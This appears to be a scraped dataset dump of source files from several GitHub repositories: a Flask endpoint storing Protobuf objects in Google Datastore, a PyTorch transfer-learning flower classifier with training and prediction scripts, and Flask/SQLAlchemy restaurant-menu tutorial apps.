Dict\n\nfrom flask import Flask\nfrom flask import request\n\nfrom google.protobuf import json_format\nfrom google.cloud import datastore\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\nfrom protobuf_cloud_datastore_translator.utils import get_module_and_class_for_model_name\n\napp = Flask(__name__)\n\n\n@app.route('/datastore/put/<key>', methods=['POST'])\ndef put_db_object(key):\n # type: (str) -> Tuple[str, int, Dict[str, str]]\n \"\"\"\n Store arbitrary Protobuf object in Google Datastore.\n\n NOTE: Request body needs to contain Protobuf model serialized as JSON.\n \"\"\"\n body = request.get_json()\n\n # Fully qualified model name, e.g. 
\"tests.generated.example_pb2.ExampleDBModel\"\n # NOTE: This module needs to be available in PYTHONPATH\n model_name = body['model_name']\n model_data = body['json_string']\n\n _, model_class = get_module_and_class_for_model_name(model_name=model_name)\n\n model_pb = json_format.Parse(model_data, model_class())\n\n # 2. Convert it into entity object\n entity_pb = model_pb_to_entity_pb(model_pb)\n\n client = datastore.Client()\n\n # Set PK on the object\n key_pb = client.key(model_pb.DESCRIPTOR.name, key).to_protobuf()\n entity_pb.key.CopyFrom(key_pb) # pylint: disable=no-member\n\n # 3. Store it inside datastore\n entity = datastore.helpers.entity_from_protobuf(entity_pb)\n client.put(entity)\n return '', 200, {}\n\n\n@app.route('/datastore/get/<key>')\ndef get_db_object(key):\n # type: (str) -> Tuple[str, int, Dict[str, str]]\n \"\"\"\n Retrieve object from Google Datastore, serialize it into native object type and serialize it\n as JSON.\n \"\"\"\n model_name = request.args.get('model_name', '')\n raw = request.args.get('raw', 'false').lower() in ['1', 'true', 'yes']\n _, model_class = get_module_and_class_for_model_name(model_name=model_name)\n\n class_name = model_class.DESCRIPTOR.name\n\n # 1. Retrieve Entity from datastore\n client = datastore.Client()\n\n key = client.key(class_name, key)\n entity = client.get(key)\n\n # 2. Translate it to custom Protobuf object\n entity_pb = datastore.helpers.entity_to_protobuf(entity)\n\n if not raw:\n model_pb = entity_pb_to_model_pb(model_pb_class=model_class, entity_pb=entity_pb)\n else:\n model_pb = entity_pb\n\n # 3. Serialize it to JSON\n model_pb_json = json_format.MessageToJson(model_pb)\n\n return model_pb_json, 200, {'Content-Type': 'application/json'}\n" } ]
30
MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch
https://github.com/MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch
1331ce9d39f7947ac6725bec15eb7811ec9e9d36
8bb1e63a0332ec7f390259e1f8251d507bd2eb04
770b09b266310331d5a06d29ce7f230b06b02a85
refs/heads/master
2022-11-18T06:49:30.032003
2020-07-16T15:46:21
2020-07-16T15:46:21
279,957,504
1
0
MIT
2020-07-15T19:21:34
2020-07-15T19:27:26
2020-07-15T19:33:41
HTML
[ { "alpha_fraction": 0.5913413166999817, "alphanum_fraction": 0.6119869947433472, "avg_line_length": 32.86016845703125, "blob_id": "217451eb2beadff0833ac70ed710d4ec80c7f03b", "content_id": "a92a8bd55c49eef8b600e3b4ef3418515e4a910f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7992, "license_type": "permissive", "max_line_length": 135, "num_lines": 236, "path": "/train.py", "repo_name": "MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 16 20:44:14 2020\n\n@author: muhammadyasir\n\"\"\"\n# load libraries\nimport pandas as pd\nimport numpy as np\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\n\nimport torchvision\nfrom torchvision import datasets, transforms, models\n\nfrom collections import OrderedDict\nfrom os import listdir\nimport time\nimport copy\nimport argparse\n\n# Initiate variables with default values\narch = 'vgg16'\nhidden_units = 5120\nlearning_rate = 0.001\nepochs = 10\ndevice = 'cpu'\n\n# Set up parameters for entry in command line\nparser = argparse.ArgumentParser()\nparser.add_argument('data_dir',type=str, help='Location of directory with data for image classifier to train and test')\nparser.add_argument('-a','--arch',action='store',type=str, help='Choose among 3 pretrained networks - vgg16, alexnet, and densenet121')\nparser.add_argument('-H','--hidden_units',action='store',type=int, help='Select number of hidden units for 1st layer')\nparser.add_argument('-l','--learning_rate',action='store',type=float, help='Choose a float number as the learning rate for the model')\nparser.add_argument('-e','--epochs',action='store',type=int, help='Choose the number of epochs you want to perform gradient descent')\nparser.add_argument('-s','--save_dir',action='store', type=str, help='Select name of file to save the trained model')\nparser.add_argument('-g','--gpu',action='store_true',help='Use GPU if available')\n\nargs = parser.parse_args()\n\n# Select parameters entered in command line\nif args.arch:\n arch = args.arch\nif args.hidden_units:\n hidden_units = args.hidden_units\nif args.learning_rate:\n learning_rate = args.learning_rate\nif args.epochs:\n epochs = args.epochs\nif args.gpu: \n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef create_model(arch='vgg16',hidden_units=5120,learning_rate=0.001):\n '''\n Function builds model\n '''\n # Select from available pretrained models\n model = getattr(models,arch)(pretrained=True)\n in_features = model.classifier[0].in_features\n \n #Freeze feature parameters so as not to backpropagate through them\n for param in model.parameters():\n param.requires_grad = False\n \n # Build classifier for model\n classifier = nn.Sequential(OrderedDict([\n ('fc1',nn.Linear(in_features,hidden_units)),\n ('ReLu1',nn.ReLU()),\n ('Dropout1',nn.Dropout(p=0.15)),\n ('fc2',nn.Linear(hidden_units,512)),\n ('ReLu2',nn.ReLU()),\n ('Dropout2',nn.Dropout(p=0.15)),\n ('fc3',nn.Linear(512,102)),\n ('output',nn.LogSoftmax(dim=1))\n ]))\n\n model.classifier = classifier\n \n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(),lr=learning_rate)\n scheduler = lr_scheduler.StepLR(optimizer,step_size=4,gamma=0.1,last_epoch=-1)\n \n return model, criterion, optimizer, scheduler\n\nmodel, criterion, optimizer, scheduler = create_model(arch, hidden_units, 
learning_rate)\n\nprint(\"-\" * 10)\nprint(\"Your model has been built!\")\n\n# Directory location of images\ndata_dir = args.data_dir\ntrain_dir = data_dir + '/train'\nvalid_dir = data_dir + '/valid'\ntest_dir = data_dir + '/test'\n\n#Define transforms for training and validation sets and normalize images\ndata_transforms = {\n 'train': transforms.Compose([\n transforms.RandomRotation(45),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n 'valid': transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n}\n\n# Dictionary holding location of training and validation data\ndata_dict = {'train':train_dir,\n 'valid': valid_dir}\n\n# Images are loaded with ImageFolder and transformations applied\nimage_datasets = {x: datasets.ImageFolder(data_dict[x],transform = data_transforms[x])\n for x in ['train', 'valid']}\n\ndataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=64,shuffle=True) \n for x in ['train', 'valid']}\n\n# Variable used in calculating trining and validation accuracies\ndataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}\n\n# Variable holding names for classes\nclass_names = image_datasets['train'].classes\n \ndef train_model(model, criterion, optimizer, scheduler, epochs=2):\n '''\n Function that trains pretrained model and classifier on image dataset and validates.\n '''\n since = time.time()\n model.to(device)\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(epochs):\n print('-' * 10)\n print('Epoch {}/{}'.format(epoch + 1, epochs))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'valid']:\n if phase == 'train':\n scheduler.step()\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n print('{} loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best valid Acc: {:.4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\nmodel_trained = train_model(model, criterion, optimizer, scheduler, epochs)\n\nprint('-' * 10)\nprint('Your model has been successfully trained')\nprint('-' * 10)\n\ndef save_model(model_trained):\n '''\n Function 
saves the trained model architecture.\n '''\n model_trained.class_to_idx = image_datasets['train'].class_to_idx\n model_trained.cpu()\n save_dir = ''\n checkpoint = {\n 'arch': arch,\n 'hidden_units': hidden_units, \n 'state_dict': model_trained.state_dict(),\n 'class_to_idx': model_trained.class_to_idx,\n }\n \n if args.save_dir:\n save_dir = args.save_dir\n else:\n save_dir = 'checkpoint.pth'\n\n torch.save(checkpoint, save_dir) \n \nsave_model(model_trained)\nprint('-' * 10)\nprint(model_trained)\nprint('Your model has been successfully saved.')\nprint('-' * 10)\n\n" }, { "alpha_fraction": 0.609343409538269, "alphanum_fraction": 0.6321500539779663, "avg_line_length": 29.550561904907227, "blob_id": "01e1ca1e9034ff486cb03be9be941ab0e6aea47e", "content_id": "8687340ffc37d996b62683f84124973c7acd6400", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5437, "license_type": "permissive", "max_line_length": 134, "num_lines": 178, "path": "/predict.py", "repo_name": "MuhammadYasir1/Image-Classification-using-Deep-Learning-in-Pytorch", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 16 20:43:00 2020\n\n@author: muhammadyasir\n\"\"\"\n\n\n#load libraries\nimport pandas as pd\nimport numpy as np\n\nimport torch\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\n\nimport torchvision\nfrom torchvision import datasets, transforms, models\n\nfrom collections import OrderedDict\nfrom PIL import Image\nfrom os import listdir\nimport json\nimport argparse\n\n# Initiate variables with default values\ncheckpoint = 'checkpoint.pth'\nfilepath = 'cat_to_name.json' \narch=''\nimage_path = 'flowers/test/100/image_07896.jpg'\ntopk = 5\n\n# Set up parameters for entry in command line\nparser = argparse.ArgumentParser()\nparser.add_argument('-c','--checkpoint', action='store',type=str, help='Name of trained model to be loaded and used for predictions.')\nparser.add_argument('-i','--image_path',action='store',type=str, help='Location of image to predict e.g. 
flowers/test/class/image')\nparser.add_argument('-k', '--topk', action='store',type=int, help='Select number of classes you wish to see in descending order.')\nparser.add_argument('-j', '--json', action='store',type=str, help='Define name of json file holding class names.')\nparser.add_argument('-g','--gpu', action='store_true', help='Use GPU if available')\n\nargs = parser.parse_args()\n\n# Select parameters entered in command line\nif args.checkpoint:\n checkpoint = args.checkpoint\nif args.image_path:\n image_path = args.image_path\nif args.topk:\n topk = args.topk\nif args.json:\n filepath = args.json\nif args.gpu:\n torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n \nwith open(filepath, 'r') as f:\n cat_to_name = json.load(f)\n\ndef load_model(checkpoint_path):\n '''\n load model from a checkpoint\n '''\n checkpoint = torch.load(checkpoint_path)\n \n if checkpoint['arch'] == 'vgg16':\n model = models.vgg16(pretrained=True)\n in_features = 25088\n for param in model.parameters():\n param.requires_grad = False\n elif checkpoint['arch'] == 'alexnet':\n model = models.alexnet(pretrained=True)\n in_features = 9216\n for param in model.parameters():\n param.requires_grad = False\n elif checkpoint['arch'] == 'densenet121':\n model = models.densenet121(pretrained=True)\n in_features = 1024\n for param in model.parameters():\n param.requires_grad = False\n else:\n print('Sorry base architecture not recognised')\n \n model.class_to_idx = checkpoint['class_to_idx']\n hidden_units = checkpoint['hidden_units']\n \n classifier = nn.Sequential(OrderedDict([\n ('fc1',nn.Linear(in_features,hidden_units)),\n ('ReLu1',nn.ReLU()),\n ('Dropout1',nn.Dropout(p=0.15)),\n ('fc2',nn.Linear(hidden_units,512)),\n ('ReLu2',nn.ReLU()),\n ('Dropout2',nn.Dropout(p=0.15)),\n ('fc3',nn.Linear(512,102)),\n ('output',nn.LogSoftmax(dim=1))\n ])) \n \n model.classifier = classifier\n model.load_state_dict(checkpoint['state_dict'])\n \n return model\n\n\ndef process_image(image_path):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n '''\n \n # Process a PIL image for use in a PyTorch model\n size = 256, 256\n crop_size = 224\n \n im = Image.open(image_path)\n \n im.thumbnail(size)\n\n left = (size[0] - crop_size)/2\n top = (size[1] - crop_size)/2\n right = (left + crop_size)\n bottom = (top + crop_size)\n\n im = im.crop((left, top, right, bottom))\n \n np_image = np.array(im)\n np_image = np_image/255\n \n means = [0.485, 0.456, 0.406]\n stds = [0.229, 0.224, 0.225]\n \n np_image = (np_image - means) / stds\n pytorch_np_image = np_image.transpose(2,0,1)\n \n return pytorch_np_image\n\ndef predict(image_path, model, topk=5):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n \n # Use process_image function to create numpy image tensor\n pytorch_np_image = process_image(image_path)\n \n # Changing from numpy to pytorch tensor\n pytorch_tensor = torch.tensor(pytorch_np_image)\n pytorch_tensor = pytorch_tensor.float()\n \n # Removing RunTimeError for missing batch size - add batch size of 1 \n pytorch_tensor = pytorch_tensor.unsqueeze(0)\n \n # Run model in evaluation mode to make predictions\n model.eval()\n LogSoftmax_predictions = model.forward(pytorch_tensor)\n predictions = torch.exp(LogSoftmax_predictions)\n \n # Identify top predictions and top labels\n top_preds, top_labs = predictions.topk(topk)\n \n \n top_preds = top_preds.detach().numpy().tolist()\n \n top_labs = top_labs.tolist()\n \n labels = 
pd.DataFrame({'class':pd.Series(model.class_to_idx),'flower_name':pd.Series(cat_to_name)})\n labels = labels.set_index('class')\n labels = labels.iloc[top_labs[0]]\n labels['predictions'] = top_preds[0]\n \n return labels\n\nmodel = load_model(checkpoint) \n\nprint('-' * 40)\n\nprint(model)\nprint('The model being used for the prediction is above.')\ninput(\"When you are ready - press Enter to continue to the prediction.\")\nlabels = predict(image_path,model,topk)\nprint('-' * 40)\nprint(labels)\nprint('-' * 40)" } ]
2
clayliau/Full-Stack-Foundations
https://github.com/clayliau/Full-Stack-Foundations
427467f747056f6f78a03736e4b46b8214114a1a
0180108e2900019526a92423fcaa62454c258a61
ba9ff711f73391ff5815427df447afdb65501c59
refs/heads/master
2021-01-21T10:26:16.161068
2019-07-13T14:06:55
2019-07-13T14:06:55
83,430,853
0
0
null
2017-02-28T12:39:18
2017-02-26T04:24:24
2017-02-02T02:50:47
null
[ { "alpha_fraction": 0.6733871102333069, "alphanum_fraction": 0.6908602118492126, "avg_line_length": 31.30434799194336, "blob_id": "7a41cb914038ae2e4e854064dbb007168c416285", "content_id": "f693e14ed9dde98dc39f08c16e8c28d651e6290a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 744, "license_type": "no_license", "max_line_length": 73, "num_lines": 23, "path": "/Lesson-3/MySitePractice/database_setup_flask_sql.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///restaurantmenu2.db'\ndb = SQLAlchemy(app)\n\nclass Restaurant(db.Model):\n __tablename__ = 'restaurant'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(250), nullable=False)\n\n\nclass MenuItem(db.Model):\n __tablename__ = 'menu_item'\n\n name = db.Column(db.String(80), nullable=False)\n id = db.Column(db.Integer, primary_key=True)\n description = db.Column(db.String(250))\n price = db.Column(db.String(8))\n course = db.Column(db.String(250))\n restaurant_id = db.Column(db.Integer, db.ForeignKey('restaurant.id'))\n restaurant = db.relationship(Restaurant)\n\n" }, { "alpha_fraction": 0.6670293807983398, "alphanum_fraction": 0.6705114245414734, "avg_line_length": 35.46825408935547, "blob_id": "2f89ebf0dc5a16cfa15e73c0e414c4387b9b04f2", "content_id": "5a8a000701699c093e5bfd2c0423c08df128b176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4595, "license_type": "no_license", "max_line_length": 118, "num_lines": 126, "path": "/Lesson-4/My-Final-Project/project.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, redirect, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Restaurant, Base, MenuItem\nfrom sqlalchemy.orm import scoped_session\n\n\nengine = create_engine('sqlite:///Lesson-3/MySitePractice/restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = scoped_session(DBSession)\n\n\napp = Flask(__name__)\n\ndef query_one_restaurant(get_id):\n res_query = session.query(Restaurant).filter(Restaurant.id==get_id).first()\n session.remove()\n return res_query\ndef query_menuItem_by_one_res_id(get_id):\n menu_query = session.query(MenuItem).filter(MenuItem.restaurant_id==get_id)\n session.remove()\n return menu_query\ndef query_menuItem_by_one_menu_id(get_id):\n menuItem_query = session.query(MenuItem).filter(MenuItem.id==get_id).one()\n session.remove()\n return menuItem_query\n\ndef add_menuItem(name, restaurant_id, description=None, price=None, course=None):\n newItem = MenuItem(name=name,\\\n restaurant_id=restaurant_id,\\\n description=description,\\\n price=price,\\\n course=course)\n session.add(newItem)\n try:\n session.commit()\n session.remove()\n return True\n except:\n session.remove()\n return False\n\ndef edit_menuItem(edit_item):\n session.add(edit_item)\n try:\n session.commit()\n session.remove()\n return True\n except:\n session.remove()\n return False\n \ndef delete_menuItem(delete_item):\n session.delete(delete_item)\n try:\n session.commit()\n session.remove()\n return True\n except:\n session.remove()\n return False\n\n\n@app.route('/')\n@app.route('/restaurants/<int:restaurant_id>/')\ndef 
restaurantMenu(restaurant_id):\n restaurant_query = query_one_restaurant(restaurant_id)\n res_menu = query_menuItem_by_one_res_id(restaurant_query.id)\n return render_template('menu.html', restaurant=restaurant_query, items=res_menu)\n\n# Task 1: Create route for newMenuItem function here\n@app.route('/restaurants/<int:restaurant_id>/new/', methods = ['GET','POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n print('Post Method')\n add_menuItem(request.form['name'], restaurant_id)\n flash('new menu item is created')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id = restaurant_id)\n #return \"page to create a new menu item. Task 1 complete!\"\n\n# Task 2: Create route for editMenuItem function here\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/edit/', methods = ['GET','POST'])\ndef editMenuItem(restaurant_id, menu_id):\n res_menu = query_menuItem_by_one_menu_id(menu_id)\n if request.method == 'POST':\n print('Post Method')\n if request.form['name']:\n res_menu.name = request.form['name']\n edit_menuItem(res_menu)\n flash('item\\'s name is updated')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu_id = menu_id, menu = res_menu)\n #return \"edit page\"\n\n# Task 3: Create a route for deleteMenuItem function here\n@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete/', methods = ['GET','POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n res_menu = query_menuItem_by_one_menu_id(menu_id)\n if request.method == 'POST':\n delete_menuItem(res_menu)\n flash('item\\'s is deleted')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('deletemenuitem.html', item = res_menu)\n return \"page to delete a menu item. 
Task 3 complete!\"\n\n@app.route('/restaurants/<int:restaurant_id>/menu/JSON')\ndef restaurantMenuJSON(restaurant_id):\n restaurant_query = query_one_restaurant(restaurant_id)\n res_menu = query_menuItem_by_one_res_id(restaurant_query.id)\n return jsonify(MenuItems=[i.serialize for i in res_menu])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON')\ndef menuJSON(restaurant_id, menu_id):\n res_menu = query_menuItem_by_one_menu_id(menu_id)\n return jsonify(MenuItems=res_menu.serialize)\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='127.0.0.1', port=5000)\n" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6761950850486755, "avg_line_length": 37.70624923706055, "blob_id": "021bf4a8bbd26aef3afcce12f4802fe59139460a", "content_id": "615e9609b0c399524f20ea2eb7bf132a9e7810ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6192, "license_type": "no_license", "max_line_length": 104, "num_lines": 160, "path": "/Lesson-4/My-Final-Project/finalproject.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, redirect, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Restaurant, Base, MenuItem\nfrom sqlalchemy.orm import scoped_session\n\nOK = True\nNoOK = False\n\nengine = create_engine('sqlite:///Lesson-3/MySitePractice/restaurantmenu.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = scoped_session(DBSession)\n\napp = Flask(__name__)\n\ndef queryAllfromDB(tableObj):\n res_query = session.query(tableObj).all()\n session.remove()\n return res_query\n\ndef addEditItemtoDB(itemObj):\n try:\n session.add(itemObj)\n session.commit()\n session.remove()\n return OK\n except:\n return NoOK\n\ndef queryOnefromDB(tableObj, target_id):\n res_query = session.query(tableObj).filter(tableObj.id==target_id).one()\n session.remove()\n return res_query\n \ndef deleteOnefromDB(itemObj):\n try:\n session.delete(itemObj)\n session.commit()\n session.remove()\n return OK\n except:\n return NoOK\n\ndef queryRestaurantMenufromDB(target_id):\n res_query = session.query(MenuItem).filter(MenuItem.restaurant_id==target_id)\n session.remove()\n return res_query\n\n\n@app.route('/')\n@app.route('/restaurants')\ndef showRestaurants():\n restaurants = queryAllfromDB(Restaurant)\n return render_template('restaurants.html', restaurants = restaurants)\n\n@app.route('/restaurants/JSON')\ndef showRestaurantsJSON():\n restaurants = queryAllfromDB(Restaurant)\n return jsonify(Restaurants = [i.serialize for i in restaurants])\n\n@app.route('/restaurant/new', methods=['POST', 'GET'])\ndef newRestaurant():\n if request.method == 'POST':\n name_from_form = request.form['name']\n newRes = Restaurant(name=name_from_form)\n addEditItemtoDB(newRes)\n flash('New restaurant %s item is added in database' %name_from_form)\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('newRestaurant.html')\n\n@app.route('/restaurant/<int:restaurant_id>/edit', methods=['POST', 'GET'])\ndef editRestaurant(restaurant_id):\n restaurant_query = queryOnefromDB(Restaurant, restaurant_id)\n if request.method == 'POST':\n old_name = restaurant_query.name\n new_name = request.form['name']\n restaurant_query.name = new_name\n addEditItemtoDB(restaurant_query)\n flash('%s\\'s name is changed to %s' 
%(old_name, new_name))\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('editRestaurant.html', restaurant=restaurant_query)\n\n@app.route('/restaurant/<int:restaurant_id>/delete', methods=['POST', 'GET'])\ndef deleteRestaurant(restaurant_id):\n restaurant_query = queryOnefromDB(Restaurant, restaurant_id)\n if request.method == 'POST':\n DeleteOK = deleteOnefromDB(restaurant_query)\n if DeleteOK:\n flash('%s is deleted from database' %(restaurant_query.name))\n else:\n flash('Error occurs when deleting %s' %(restaurant_query.name))\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('deleteRestaurant.html', restaurant=restaurant_query)\n\n@app.route('/restaurant/<int:restaurant_id>')\n@app.route('/restaurant/<int:restaurant_id>/menu')\ndef showMenu(restaurant_id):\n menu_item = queryRestaurantMenufromDB(restaurant_id)\n restaurant = queryOnefromDB(Restaurant, restaurant_id)\n return render_template('menu.html', restaurant = restaurant, items = menu_item)\n\n@app.route('/restaurant/<int:restaurant_id>/JSON')\n@app.route('/restaurant/<int:restaurant_id>/menu/JSON')\ndef showMenuJSON(restaurant_id):\n menu_item = queryRestaurantMenufromDB(restaurant_id)\n return jsonify(MenuItems = [i.serialize for i in menu_item])\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/JSON')\ndef showMenuItemJSON(restaurant_id, menu_id):\n target_item = queryOnefromDB(MenuItem, menu_id)\n return jsonify(MenuItem = target_item.serialize)\n\n@app.route('/restaurant/<int:restaurant_id>/menu/new', methods=['POST', 'GET'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n newItem = MenuItem(name = request.form['name'],\\\n description = request.form['description'],\\\n price = request.form['price'],\\\n course = request.form['course'],\n restaurant_id = restaurant_id)\n addEditItemtoDB(newItem)\n flash('New menu item %s is added in database' %request.form['name'])\n return redirect(url_for('showMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html') \n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/edit', methods = ['POST', 'GET'])\ndef editMenuItem(restaurant_id, menu_id):\n target_item = queryOnefromDB(MenuItem, menu_id)\n if request.method == 'POST':\n old_name = target_item.name\n target_item.name = request.form['name']\n target_item.description = request.form['description']\n target_item.price = request.form['price']\n target_item.course = request.form['course']\n addEditItemtoDB(target_item)\n flash('Menu item %s is modified in database' %old_name)\n return redirect(url_for('showMenu', restaurant_id = restaurant_id))\n else:\n return render_template('editmenuitem.html', item = target_item, restaurant_id= restaurant_id)\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/delete', methods = ['POST', 'GET'])\ndef deleteMenuItem(restaurant_id, menu_id):\n target_item = queryOnefromDB(MenuItem, menu_id)\n if request.method == 'POST':\n deleteOnefromDB(target_item)\n flash('Menu item %s is deleted in database' %target_item.name)\n return redirect(url_for('showMenu', restaurant_id = restaurant_id))\n else:\n return render_template('deletemenuitem.html', item = target_item, restaurant_id= restaurant_id)\n\n\nif __name__=='__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='127.0.0.1', port=5000)" }, { "alpha_fraction": 0.7089460492134094, "alphanum_fraction": 0.7156862616539001, "avg_line_length": 33.74468231201172, "blob_id": 
"5f3d0ba1c6ce105899505cd357afbad6b52ac352", "content_id": "9fcbdd49afc595ee89e9a32b001ad72768c22823", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 92, "num_lines": 47, "path": "/Lesson-3/MySitePractice/finalproject.py", "repo_name": "clayliau/Full-Stack-Foundations", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, redirect, flash, jsonify\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///Lesson-4/Final-Project/restaurantmenu.db'\ndb = SQLAlchemy(app)\n\n\n@app.route('/')\n@app.route('/restaurants')\ndef showRestaurants():\n\n return 'This page will show all my restaurants'\n\n@app.route('/restaurant/new')\ndef newRestaurants():\n return \"This page will be for making new restaurant\"\n\n@app.route('/restaurant/<int:restaurant_id>/edit')\ndef editRestaurants(restaurant_id):\n return \"This page will be for editing restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>/delete')\ndef deleteRestaurants(restaurant_id):\n return \"This page will be for deleting restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>')\n@app.route('/restaurant/<int:restaurant_id>/menu')\ndef showMenu(restaurant_id):\n return \"This page is the menu for restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>/menu/new')\ndef newMenuItem(restaurant_id):\n return \"This page is for adding new menu item for restaurant %s\" % restaurant_id\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/edit')\ndef editMenuItem(restaurant_id, menu_id):\n return \"This page is for editing menu item %s\" % menu_id\n\n@app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/delete')\ndef deleteMenuItem(restaurant_id, menu_id):\n return \"This page is for deleting menu item %s\" % menu_id\n\nif __name__=='__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='127.0.0.1', port=5000)" } ]
4
Yang-shihong/Chat
https://github.com/Yang-shihong/Chat
31729918c6b18d35d364aa486325631db63d7742
3f1803b9863adcdc2b8ee9b10d9845884e3aba07
28db6ab0b215add0236dbc938c6e16f0d03d5108
refs/heads/master
2020-05-15T10:13:42.066239
2018-10-09T06:59:21
2018-10-09T06:59:21
null
0
0
null
null
null
null
null
